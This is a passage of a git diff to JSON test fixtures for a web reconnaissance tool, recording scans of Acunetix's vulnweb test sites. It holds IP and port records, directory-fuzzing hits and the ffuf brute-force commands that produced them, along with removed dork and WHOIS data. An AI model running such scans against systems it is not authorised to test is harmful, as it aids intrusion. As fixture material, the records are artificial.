"pk": 15, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/3201261889909211/posts/4007311169304275/" + "name": "Basic" } }, { - "model": "startScan.dork", - "pk": 31, + "model": "startScan.ipaddress", + "pk": 1, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/3201261889909211/posts/4188319924536731/" + "address": "44.228.249.3", + "is_cdn": false, + "geo_iso": null, + "version": null, + "is_private": false, + "reverse_pointer": null, + "ports": [ + 2 + ], + "ip_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 32, + "model": "startScan.ipaddress", + "pk": 2, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/3201261889909211/posts/4367877359914319/" + "address": "18.215.71.186", + "is_cdn": false, + "geo_iso": null, + "version": null, + "is_private": false, + "reverse_pointer": null, + "ports": [ + 1, + 2 + ], + "ip_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 33, + "model": "startScan.ipaddress", + "pk": 3, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/3201261889909211/posts/6293716407330395/" + "address": "44.238.29.244", + "is_cdn": false, + "geo_iso": null, + "version": null, + "is_private": false, + "reverse_pointer": null, + "ports": [ + 2 + ], + "ip_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 34, + "model": "startScan.port", + "pk": 1, "fields": { - "type": "social_media", - "url": "https://m.facebook.com/groups/hackingteam2022/posts/2726773620796174/" + "number": 8081, + "service_name": "unknown", + "description": "", + "is_uncommon": true } }, { - "model": "startScan.dork", - "pk": 35, + "model": "startScan.port", + "pk": 2, "fields": { - "type": "social_media", - "url": "https://www.facebook.com/KaliLinuxBrazil/photos/tenha-certeza-de-estar-com-o-tor-instaladoinstala%C3%A7%C3%A3o-tor-rootkaliapt-get-install/972928206082146/" + "number": 80, + "service_name": "unknown", + "description": "", + "is_uncommon": false } }, { - "model": "startScan.dork", - "pk": 36, + "model": "startScan.directoryfile", + "pk": 1, "fields": { - "type": "social_media", - "url": "https://www.facebook.com/KaliLinuxBrazil/photos/tenha-certeza-de-estar-com-o-tor-instaladoinstala&C3&A7&C3&A3o-tor-rootkaliapt-get-install/972928206082146/" + "length": 0, + "lines": 1, + "http_status": 200, + "words": 1, + "name": "Y29uZmlnLnBocA==", + "url": "http://rest.vulnweb.com/config.php", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 37, + "model": "startScan.directoryfile", + "pk": 2, "fields": { - "type": "social_media", - "url": "https://www.facebook.com/groups/3201261889909211/" + "length": 317, + "lines": 8, + "http_status": 200, + "words": 42, + "name": "ZGI=", + "url": "http://rest.vulnweb.com/db", + "content_type": "application/x-sql" } }, { - "model": "startScan.dork", - "pk": 38, + "model": "startScan.directoryfile", + "pk": 3, "fields": { - "type": "social_media", - "url": "https://mobile.twitter.com/MrHades2020" + "length": 317, + "lines": 8, + "http_status": 200, + "words": 42, + "name": "ZGIuc3Fs", + "url": "http://rest.vulnweb.com/db.sql", + "content_type": "application/x-sql" } }, { - "model": "startScan.dork", - "pk": 39, + "model": "startScan.directoryfile", + "pk": 4, "fields": { - "type": "social_media", - "url": "https://twitter.com/0xSwayamm" + "length": 28698, + "lines": 688, + "http_status": 200, + "words": 5391, + "name": "ZG9jcy8=", + "url": "http://rest.vulnweb.com/docs/", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 40, + "model": "startScan.directoryfile", + "pk": 5, "fields": { - "type": "social_media", - "url": "https://twitter.com/7h3r4bb17" + "length": 3556, + "lines": 138, + "http_status": 200, + "words": 1398, + "name": "aW5kZXgucGhw", + "url": "http://rest.vulnweb.com/index.php", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 41, + "model": "startScan.directoryfile", + "pk": 6, "fields": { - "type": "social_media", - "url": "https://twitter.com/SadatTamzit" + "length": 83050, + "lines": 951, + "http_status": 200, + "words": 4178, + "name": "aW5mby5waHA=", + "url": "http://rest.vulnweb.com/info.php", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 42, + "model": "startScan.directoryfile", + "pk": 7, "fields": { - "type": "social_media", - "url": "https://twitter.com/deathpoolx1" + "length": 3194, + "lines": 55, + "http_status": 200, + "words": 429, + "name": "bG9naW4uYXNw", + "url": "http://testasp.vulnweb.com/login.asp", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 43, + "model": "startScan.directoryfile", + "pk": 8, "fields": { - "type": "social_media", - "url": "https://twitter.com/hunterabubakar" + "length": 13, + "lines": 1, + "http_status": 200, + "words": 2, + "name": "cm9ib3RzLnR4dA==", + "url": "http://testasp.vulnweb.com/robots.txt", + "content_type": "text/plain" } }, { - "model": "startScan.dork", - "pk": 44, + "model": "startScan.directoryfile", + "pk": 9, "fields": { - "type": "social_media", - "url": "https://twitter.com/kg4409" + "length": 13, + "lines": 1, + "http_status": 200, + "words": 2, + "name": "cm9ib3RzLnR4dA==", + "url": "http://testaspnet.vulnweb.com/robots.txt", + "content_type": "text/plain" } }, { - "model": "startScan.dork", - "pk": 45, + "model": "startScan.directoryfile", + "pk": 10, "fields": { - "type": "social_media", - "url": "https://twitter.com/ravidutt04?lang" + "length": 3, + "lines": 1, + "http_status": 200, + "words": 1, + "name": "dGVzdC50eHQ=", + "url": "http://testaspnet.vulnweb.com/test.txt", + "content_type": "text/plain" } }, { - "model": "startScan.dork", - "pk": 46, + "model": "startScan.directoryfile", + "pk": 11, "fields": { - "type": "social_media", - "url": "https://twitter.com/ravidutt04?lang=ca" + "length": 493, + "lines": 15, + "http_status": 200, + "words": 87, + "name": "ZXhhbXBsZXM=", + "url": "http://testhtml5.vulnweb.com/examples", + "content_type": "text/html; charset=utf-8" } }, { - "model": "startScan.dork", - "pk": 47, + "model": "startScan.directoryfile", + "pk": 12, "fields": { - "type": "social_media", - "url": "https://twitter.com/therceman/status/1711473903934054427" + "length": 143, + "lines": 5, + "http_status": 200, + "words": 13, + "name": "LmlkZWEvc2NvcGVzL3Njb3BlX3NldHRpbmdzLnhtbA==", + "url": "http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml", + "content_type": "text/xml" } }, { - "model": "startScan.dork", - "pk": 48, + "model": "startScan.directoryfile", + "pk": 13, "fields": { - "type": "social_media", - "url": "https://twitter.com/vishack81" + "length": 275, + "lines": 10, + "http_status": 200, + "words": 26, + "name": "LmlkZWEvbW9kdWxlcy54bWw=", + "url": "http://testphp.vulnweb.com/.idea/modules.xml", + "content_type": "text/xml" } }, { - "model": "startScan.dork", - "pk": 49, + "model": "startScan.directoryfile", + "pk": 14, "fields": { - "type": "social_media", - "url": "https://m.youtube.com/watch?v" + "length": 266, + "lines": 9, + "http_status": 200, + "words": 18, + "name": "LmlkZWEvbWlzYy54bWw=", + "url": "http://testphp.vulnweb.com/.idea/misc.xml", + "content_type": "text/xml" } }, { - "model": "startScan.dork", - "pk": 50, + "model": "startScan.directoryfile", + "pk": 15, "fields": { - "type": "social_media", - "url": "https://m.youtube.com/watch?v=2_lswM1S264" + "length": 171, + "lines": 6, + "http_status": 200, + "words": 10, + "name": "LmlkZWEvZW5jb2RpbmdzLnhtbA==", + "url": "http://testphp.vulnweb.com/.idea/encodings.xml", + "content_type": "text/xml" } }, { - "model": "startScan.dork", - "pk": 51, + "model": "startScan.directoryfile", + "pk": 16, "fields": { - "type": "social_media", - "url": "https://m.youtube.com/watch?v=2tJgPyRITGc" + "length": 951, + "lines": 14, + "http_status": 200, + "words": 427, + "name": "LmlkZWEv", + "url": "http://testphp.vulnweb.com/.idea/", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 52, + "model": "startScan.directoryfile", + "pk": 17, "fields": { - "type": "social_media", - "url": "https://m.youtube.com/watch?v=6FDKHewTP4A" + "length": 173, + "lines": 8, + "http_status": 200, + "words": 16, + "name": "LmlkZWEvdmNzLnhtbA==", + "url": "http://testphp.vulnweb.com/.idea/vcs.xml", + "content_type": "text/xml" } }, { - "model": "startScan.dork", - "pk": 53, + "model": "startScan.directoryfile", + "pk": 18, "fields": { - "type": "social_media", - "url": "https://m.youtube.com/watch?v=cEoPdpVUeyU" + "length": 12473, + "lines": 217, + "http_status": 200, + "words": 1702, + "name": "LmlkZWEvd29ya3NwYWNlLnhtbA==", + "url": "http://testphp.vulnweb.com/.idea/workspace.xml", + "content_type": "text/xml" } }, { - "model": "startScan.dork", - "pk": 54, + "model": "startScan.directoryfile", + "pk": 19, "fields": { - "type": "social_media", - "url": "https://m.youtube.com/watch?v=gHkGuVb9vX8" + "length": 400, + "lines": 9, + "http_status": 200, + "words": 122, + "name": "X21tU2VydmVyU2NyaXB0cy8=", + "url": "http://testphp.vulnweb.com/_mmServerScripts/", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 55, + "model": "startScan.directoryfile", + "pk": 20, "fields": { - "type": "social_media", - "url": "https://www.youtube.com/watch?v" + "length": 93, + "lines": 1, + "http_status": 200, + "words": 4, + "name": "X21tU2VydmVyU2NyaXB0cy9NTUhUVFBEQi5waHA=", + "url": "http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 56, + "model": "startScan.directoryfile", + "pk": 21, "fields": { - "type": "social_media", - "url": "https://www.youtube.com/watch?v=IbDAHDSlgYg" + "length": 262, + "lines": 8, + "http_status": 200, + "words": 66, + "name": "YWRtaW4v", + "url": "http://testphp.vulnweb.com/admin/", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 57, + "model": "startScan.directoryfile", + "pk": 22, "fields": { - "type": "social_media", - "url": "https://www.youtube.com/watch?v=ZstyFyfS3g4" + "length": 1, + "lines": 1, + "http_status": 200, + "words": 2, + "name": "Q1ZTL0VudHJpZXM=", + "url": "http://testphp.vulnweb.com/CVS/Entries", + "content_type": "application/octet-stream" } }, { - "model": "startScan.dork", - "pk": 58, + "model": "startScan.directoryfile", + "pk": 23, "fields": { - "type": "social_media", - "url": "https://www.youtube.com/watch?v=cEoPdpVUeyU" + "length": 1, + "lines": 1, + "http_status": 200, + "words": 2, + "name": "Q1ZTL1Jvb3Q=", + "url": "http://testphp.vulnweb.com/CVS/Root", + "content_type": "application/octet-stream" } }, { - "model": "startScan.dork", - "pk": 59, + "model": "startScan.directoryfile", + "pk": 24, "fields": { - "type": "social_media", - "url": "https://www.youtube.com/watch?v=dabm-7CcHaE" + "length": 595, + "lines": 11, + "http_status": 200, + "words": 262, + "name": "Q1ZTLw==", + "url": "http://testphp.vulnweb.com/CVS/", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 60, + "model": "startScan.directoryfile", + "pk": 25, "fields": { - "type": "social_media", - "url": "https://www.youtube.com/watch?v=tAxMpoKkvCw" + "length": 377, + "lines": 9, + "http_status": 200, + "words": 128, + "name": "aW1hZ2VzLw==", + "url": "http://testphp.vulnweb.com/images/", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 61, + "model": "startScan.directoryfile", + "pk": 26, "fields": { - "type": "social_media", - "url": "https://www.reddit.com/r/sysadmin/comments/gs031c/how_to_login_to_web_by_submitting_username/" + "length": 4958, + "lines": 110, + "http_status": 200, + "words": 514, + "name": "aW5kZXgucGhw", + "url": "http://testphp.vulnweb.com/index.php", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 62, + "model": "startScan.directoryfile", + "pk": 27, "fields": { - "type": "code_sharing", - "url": "https://github.com/dradis/dradis-acunetix/blob/master/spec/fixtures/files/testphp.vulnweb.com.export.acunetix.xml" + "length": 2586, + "lines": 2, + "http_status": 200, + "words": 9, + "name": "aW5kZXguemlw", + "url": "http://testphp.vulnweb.com/index.zip", + "content_type": "application/zip" } }, { - "model": "startScan.dork", - "pk": 63, + "model": "startScan.directoryfile", + "pk": 28, "fields": { - "type": "code_sharing", - "url": "https://github.com/dtag-dev-sec/explo/blob/master/examples/SQLI_LOGIN_testphp.vulnweb.com.yaml" + "length": 5523, + "lines": 120, + "http_status": 200, + "words": 557, + "name": "bG9naW4ucGhw", + "url": "http://testphp.vulnweb.com/login.php", + "content_type": "text/html; charset=UTF-8" } }, { - "model": "startScan.dork", - "pk": 64, + "model": "startScan.directoryfile", + "pk": 29, "fields": { - "type": "code_sharing", - "url": "https://github.com/dtag-dev-sec/explo/blob/master/examples/SQLI_testphp.vulnweb.com.yaml" + "length": 268, + "lines": 8, + "http_status": 200, + "words": 60, + "name": "dmVuZG9yLw==", + "url": "http://testphp.vulnweb.com/vendor/", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 65, + "model": "startScan.directoryfile", + "pk": 30, "fields": { - "type": "code_sharing", - "url": "https://github.com/yangbh/Hammer/blob/master/output/testphp.vulnweb.com/http_testphp.vulnweb.com" + "length": 4018, + "lines": 74, + "http_status": 200, + "words": 482, + "name": "aW5kZXguaHRtbA==", + "url": "http://vulnweb.com/index.html", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 66, + "model": "startScan.directoryfile", + "pk": 31, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/alms/KrG4LL" + "length": 4018, + "lines": 74, + "http_status": 200, + "words": 482, + "name": "aW5kZXguaHRtbA==", + "url": "http://www.vulnweb.com/index.html", + "content_type": "text/html" } }, { - "model": "startScan.dork", - "pk": 67, + "model": "startScan.directoryscan", + "pk": 1, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/bakueikozo/rex9ar/playstation-classic-uart-login-console" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://rest.vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:34:17.027Z", + "directory_files": [ + 1, + 2, + 3, + 4, + 5, + 6 + ], + "dir_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 68, + "model": "startScan.directoryscan", + "pk": 2, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/especnorthamerica/neb6dq/examples-of-web-controller-rest-api-usage" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testasp.vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:36:18.344Z", + "directory_files": [ + 7, + 8 + ], + "dir_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 69, + "model": "startScan.directoryscan", + "pk": 3, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/faridani/pRX6r" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testaspnet.vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:37:06.726Z", + "directory_files": [ + 9, + 10 + ], + "dir_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 70, + "model": "startScan.directoryscan", + "pk": 4, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/orrp/xeGzXB/interactive-mgg" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testhtml5.vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:37:52.654Z", + "directory_files": [ + 11 + ], + "dir_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 71, + "model": "startScan.directoryscan", + "pk": 5, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/raerose01/5enKR5" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testphp.vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:38:36.651Z", + "directory_files": [ + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20, + 21, + 22, + 23, + 24, + 25, + 26, + 27, + 28, + 29 + ], + "dir_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 72, + "model": "startScan.directoryscan", + "pk": 6, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/sglienke/64LG6b/introsort" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:39:18.406Z", + "directory_files": [ + 30 + ], + "dir_subscan_ids": [] } }, { - "model": "startScan.dork", - "pk": 73, + "model": "startScan.directoryscan", + "pk": 7, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/sglienke/6oBqMb" + "command_line": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://www.vulnweb.com/FUZZ -json", + "scanned_date": "2024-11-13T02:40:00.581Z", + "directory_files": [ + 31 + ], + "dir_subscan_ids": [] } }, { "model": "startScan.dork", - "pk": 74, + "pk": 1, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/suntorytime/rAGXar/wellness-sources-overview" + "type": "config_files", + "url": "http://testphp.vulnweb.com/.idea/misc.xml" } }, { "model": "startScan.dork", - "pk": 75, + "pk": 2, "fields": { - "type": "code_sharing", - "url": "https://bitbucket.org/snippets/wmgodyak/6bXKj" + "type": "config_files", + "url": "http://testphp.vulnweb.com/.idea/workspace.xml" } }, { "model": "startScan.dork", - "pk": 76, + "pk": 3, "fields": { "type": "config_files", - "url": "http://testphp.vulnweb.com/.idea/workspace.xml" + "url": "http://testphp.vulnweb.com/crossdomain.xml" } }, { "model": "startScan.dork", - "pk": 77, + "pk": 4, "fields": { "type": "config_files", - "url": "http://testphp.vulnweb.com/crossdomain.xml" + "url": "http://testphp.vulnweb.com/pictures/ipaddresses.txt" } } ] diff --git a/web/targetApp/fixtures/targetApp.json b/web/targetApp/fixtures/targetApp.json index 0a23be7c..0db1fffe 100644 --- a/web/targetApp/fixtures/targetApp.json +++ b/web/targetApp/fixtures/targetApp.json @@ -1,507 +1,4 @@ [ -{ - "model": "targetApp.historicalip", - "pk": 1, - "fields": { - "ip": "44.228.249.3", - "location": "Boardman - United States", - "owner": "AMAZON-02", - "last_seen": "AMAZON-02" - } -}, -{ - "model": "targetApp.historicalip", - "pk": 2, - "fields": { - "ip": "18.192.172.30", - "location": "Frankfurt am Main - Germany", - "owner": "AMAZON-02", - "last_seen": "AMAZON-02" - } -}, -{ - "model": "targetApp.historicalip", - "pk": 3, - "fields": { - "ip": "176.28.50.165", - "location": "Strasbourg - France", - "owner": "Host Europe GmbH", - "last_seen": "Host Europe GmbH" - } -}, -{ - "model": "targetApp.historicalip", - "pk": 4, - "fields": { - "ip": "50.116.82.164", - "location": "United States", - "owner": "UNIFIEDLAYER-AS-1", - "last_seen": "UNIFIEDLAYER-AS-1" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 1, - "fields": { - "name": "2xax.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 2, - "fields": { - "name": "accunetix.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 3, - "fields": { - "name": "acunetix.asia" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 4, - "fields": { - "name": "acunetix.at" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 5, - "fields": { - "name": "acunetix.biz" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 6, - "fields": { - "name": "acunetix.co" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 7, - "fields": { - "name": "acunetix.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 8, - "fields": { - "name": "acunetix.in" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 9, - "fields": { - "name": "acunetix.info" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 10, - "fields": { - "name": "acunetix.jp" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 11, - "fields": { - "name": "acunetix.net" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 12, - "fields": { - "name": "acunetix.org" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 13, - "fields": { - "name": "acunetix.tw" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 14, - "fields": { - "name": "bxss.me" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 15, - "fields": { - "name": "free-security-audit.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 16, - "fields": { - "name": "free-security-scan.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 17, - "fields": { - "name": "mbsa-reporter.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 18, - "fields": { - "name": "mbsareporter.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 19, - "fields": { - "name": "networkdefender.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 20, - "fields": { - "name": "networkdefender.net" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 21, - "fields": { - "name": "security-analyzer-reporter.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 22, - "fields": { - "name": "sitesecurityaudit.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 23, - "fields": { - "name": "sitesecuritymonitor.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 24, - "fields": { - "name": "sitesecuritymonitor.net" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 25, - "fields": { - "name": "sql-injection-audit.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 26, - "fields": { - "name": "sql-injection-scan.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 27, - "fields": { - "name": "sqlinjectionscanner.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 28, - "fields": { - "name": "vulnweb.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 29, - "fields": { - "name": "web-security-audit.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 30, - "fields": { - "name": "web-site-defender.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 31, - "fields": { - "name": "web-sitedefender.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 32, - "fields": { - "name": "website-audit.org" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 33, - "fields": { - "name": "website-defender.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 34, - "fields": { - "name": "websitedefender.asia" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 35, - "fields": { - "name": "websitedefender.at" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 36, - "fields": { - "name": "websitedefender.co" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 37, - "fields": { - "name": "websitedefender.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 38, - "fields": { - "name": "websitesecuritycenter.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 39, - "fields": { - "name": "websitesecuritymonitor.com" - } -}, -{ - "model": "targetApp.relateddomain", - "pk": 40, - "fields": { - "name": "webvulnerabilityscanner.com" - } -}, -{ - "model": "targetApp.registrar", - "pk": 1, - "fields": { - "name": "Eurodns S.A.", - "phone": "+352.27220150", - "email": "legalservices@eurodns.com", - "url": null - } -}, -{ - "model": "targetApp.domainregistration", - "pk": 1, - "fields": { - "name": "Acunetix Acunetix", - "organization": "Acunetix Ltd", - "address": "3rd Floor,, J&C Building,, Road Town", - "city": "Tortola", - "state": null, - "zip_code": "VG1110", - "country": "VG", - "email": "administrator@acunetix.com", - "phone": "+1.23456789", - "fax": null, - "id_str": null - } -}, -{ - "model": "targetApp.domainregistration", - "pk": 2, - "fields": { - "name": null, - "organization": null, - "address": null, - "city": null, - "state": null, - "zip_code": null, - "country": null, - "email": null, - "phone": null, - "fax": null, - "id_str": null - } -}, -{ - "model": "targetApp.whoisstatus", - "pk": 1, - "fields": { - "name": "clienttransferprohibited" - } -}, -{ - "model": "targetApp.nameserver", - "pk": 1, - "fields": { - "name": "ns1.eurodns.com" - } -}, -{ - "model": "targetApp.nameserver", - "pk": 2, - "fields": { - "name": "ns2.eurodns.com" - } -}, -{ - "model": "targetApp.nameserver", - "pk": 3, - "fields": { - "name": "ns3.eurodns.com" - } -}, -{ - "model": "targetApp.nameserver", - "pk": 4, - "fields": { - "name": "ns4.eurodns.com" - } -}, -{ - "model": "targetApp.dnsrecord", - "pk": 1, - "fields": { - "name": "44.228.249.3", - "type": "a" - } -}, -{ - "model": "targetApp.dnsrecord", - "pk": 2, - "fields": { - "name": "v=spf1 -all", - "type": "txt" - } -}, -{ - "model": "targetApp.dnsrecord", - "pk": 3, - "fields": { - "name": "google-site-verification=4lqorv-lti-d4gpxtbeqwmfnwff7uaazqc9gzvhukbw", - "type": "txt" - } -}, -{ - "model": "targetApp.domaininfo", - "pk": 1, - "fields": { - "dnssec": false, - "created": "2010-06-14T00:00:00Z", - "updated": "2023-05-26T10:04:20Z", - "expires": "2025-06-13T00:00:00Z", - "geolocation_iso": "VG", - "registrar": 1, - "registrant": 1, - "admin": 2, - "tech": 2, - "whois_server": "whois.eurodns.com", - "status": [ - 1 - ], - "name_servers": [ - 1, - 2, - 3, - 4 - ], - "dns_records": [ - 1, - 2, - 3 - ], - "related_domains": [ - 1, - 2, - 3, - 4, - 5, - 6, - 7, - 8, - 9, - 10, - 11, - 12, - 13, - 14, - 15, - 16, - 17, - 18, - 19, - 20, - 21, - 22, - 23, - 24, - 25, - 26, - 27, - 28, - 29, - 30, - 31, - 32, - 33, - 34, - 35, - 36, - 37, - 38, - 39, - 40 - ], - "related_tlds": [], - "similar_domains": [], - "historical_ips": [ - 1, - 2, - 3, - 4 - ] - } -}, { "model": "targetApp.domain", "pk": 1, @@ -510,10 +7,10 @@ "h1_team_handle": "", "ip_address_cidr": null, "description": "", - "insert_date": "2024-09-03T21:23:39.098Z", - "start_scan_date": "2024-09-04T19:29:56.563Z", + "insert_date": "2024-11-13T02:02:14.438Z", + "start_scan_date": "2024-11-13T02:04:14.663Z", "request_headers": null, - "domain_info": 1, + "domain_info": null, "project": 1 } }